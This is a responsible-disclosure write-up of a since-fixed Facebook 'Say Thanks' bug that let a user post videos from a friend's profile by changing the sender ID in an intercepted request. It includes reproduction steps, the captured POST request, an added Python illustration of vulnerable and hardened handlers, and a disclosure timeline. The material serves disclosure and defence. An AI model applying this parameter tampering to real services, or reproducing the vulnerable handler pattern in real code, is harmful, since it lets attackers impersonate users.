[Responsible disclosure] Hacking Facebook.com/thanks Posting on behalf of your friends!

Note: This is being published with the permission of Facebook under the responsible disclosure policy. The vulnerability is now fixed.

Facebook recently introduced "Say Thanks", an experience that lets a Facebook user create personalized video cards for their Facebook friends.

To create a Thanks video, a user visits facebook.com/thanks and chooses a friend. The user can select a different theme and edit the photos and posts that represent the friendship.
Once ready, the user clicks the "Share" button and the video is shared on their timeline with the friend tagged. It shows up on the user's timeline as well as the friend's.

So, I started digging as soon as "Say Thanks" was launched.

Below are the things that I tried:

1) Posting on behalf of a user who is not a Facebook friend.
2) Posting on behalf of a Facebook friend.

Interestingly, posting on behalf of your Facebook friends worked.
After successful exploitation, a video saying thanks was posted from the victim's profile.

Bug type: Insecure Direct Object Reference (OWASP Top 10 A4)

Steps to reproduce:

1) Go to https://www.facebook.com/thanks
2) Choose any friend from your list. Now, in the top corner, click the "Share video" option.
3) Before posting, make sure Burp Suite's intercept is turned on to capture the request.

Click "Post Video" now; you will see a request like the one below in Burp Suite:

POST /thanks/send/async/ HTTP/1.1

Host: www.facebook.com

fb_dtsg=YYYYYY&message_text=Hey Anand, I made you a video to say thanks for being such a good friend. You can make your own at facebook.com/thanks #saythanks&message=Hey @[1234543:Anand], I made you a video to say thanks for being such a good friend. You can make your own at facebook.com/thanks #saythanks&cache_version=24&content=[]&content_count=0&receiver={"id":1234543,"fbid":1234543,"name":"Anand Prakash","imageURL":"","gender":2,"greeting":"Hey Anand","shortName":"Anand","relationship":-1,"relationshipName":null,"firstName":"Anand","genderType":"MALE","profilePhoto":"","profilePhotoID":8359028035,"profilePhotoBegin":"}&sender={"id":131232524,"name":"Sunil Bhati","firstName":"Sunil","genderType":"MALE","profilePhoto":"","profilePhotoID":,"profilePhotoBegin":"","profilePhotoBeginID":328985902339}&timestamp=1417279810172&theme_details={}&theme_id=DEFAULT_THEME&privacyx=9238943&__user=1234543__a=1&__dyn=&__req=13&ttstamp=__rev=1512134

4) I changed sender={id=XXXXX to the victim's Facebook ID (XXXXX here) and within a few seconds the video got posted from the victim's Facebook profile.
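The root cause is that the server attributed the post to the client-supplied sender object instead of the authenticated session user. The following is an added illustration, not Facebook's code: a constructed request body modelled on the captured request above (all IDs are placeholders), a hypothetical handler that behaves the way the page describes the bug, and a hardened handler that takes the author from the session and rejects a mismatching sender.id so the tampering attempt is visible rather than silently corrected.

```python
"""Added example (not Facebook's code): the IDOR on /thanks/send/async/
as a before/after pair of request handlers.

Assumptions: the authenticated user ID is available server-side (passed in
here as session_user_id); the body is application/x-www-form-urlencoded with
JSON-encoded `sender` and `receiver` fields, as in the captured request.
"""
import json
from urllib.parse import parse_qs

# Constructed request body (placeholder IDs). The logged-in user is
# 131232524, but sender.id has been rewritten to 99999.
TAMPERED_BODY = (
    "fb_dtsg=YYYYYY"
    "&message_text=Hey+Anand%2C+thanks"
    "&receiver=%7B%22id%22%3A1234543%7D"
    "&sender=%7B%22id%22%3A99999%2C%22name%22%3A%22Victim%22%7D"
    "&__user=131232524"
)

# Constructed honest body: sender.id matches the logged-in user.
HONEST_BODY = TAMPERED_BODY.replace("%22id%22%3A99999", "%22id%22%3A131232524")


class Forbidden(Exception):
    """Raised by the hardened handler when the client claims another author."""


def parse_form(body: str) -> dict:
    """Decode a form-encoded body into a dict of single string values."""
    return {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}


def vulnerable_post(body: str, session_user_id: int) -> dict:
    """Hypothetical pre-fix behaviour: the post's author is whatever sender.id
    the client sent. session_user_id is accepted but never consulted, which is
    exactly the insecure direct object reference."""
    form = parse_form(body)
    sender = json.loads(form["sender"])
    receiver = json.loads(form["receiver"])
    return {"author_id": int(sender["id"]), "tagged_id": int(receiver["id"])}


def hardened_post(body: str, session_user_id: int) -> dict:
    """Hypothetical fixed behaviour: the author is always the authenticated
    user. A client-supplied sender.id that disagrees is rejected outright so
    the attempt can be logged, instead of being quietly overwritten."""
    form = parse_form(body)
    receiver = json.loads(form["receiver"])
    claimed = json.loads(form.get("sender", "{}")).get("id")
    if claimed is not None and int(claimed) != session_user_id:
        raise Forbidden(f"sender.id {claimed} does not match session user {session_user_id}")
    # A friendship check between author and receiver also belongs here;
    # omitted because the page does not describe how Facebook enforces it.
    return {"author_id": session_user_id, "tagged_id": int(receiver["id"])}


def is_rejected(body: str, session_user_id: int) -> bool:
    """True if the hardened handler refuses the request."""
    try:
        hardened_post(body, session_user_id)
    except Forbidden:
        return True
    return False


if __name__ == "__main__":
    print("vulnerable:", vulnerable_post(TAMPERED_BODY, 131232524))
    print("hardened rejects tampered body:", is_rejected(TAMPERED_BODY, 131232524))
    print("hardened accepts honest body:", hardened_post(HONEST_BODY, 131232524))
```

The detection angle follows from the same check: every rejected request carries the session user, the claimed sender and the receiver, which is enough to alert on repeated mismatches from one account.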


Nov 14, 2014 12:41am - Report sent to Facebook Security team
Nov 14, 2014 2:00am  - Initial reply from Mordecai saying he is not able to reproduce the issue
Nov 14, 2014 8:17am  - Confirmation of vulnerability from Neal Poole
Nov 14, 2014 10:42am - Issue fixed by Facebook
Nov 14, 2014 11:44am - Fix verification by me
Nov 19, 2014 10:10am - Bounty of $12,500 awarded by Facebook.

Thanks to the Facebook security team for quickly fixing the issue.
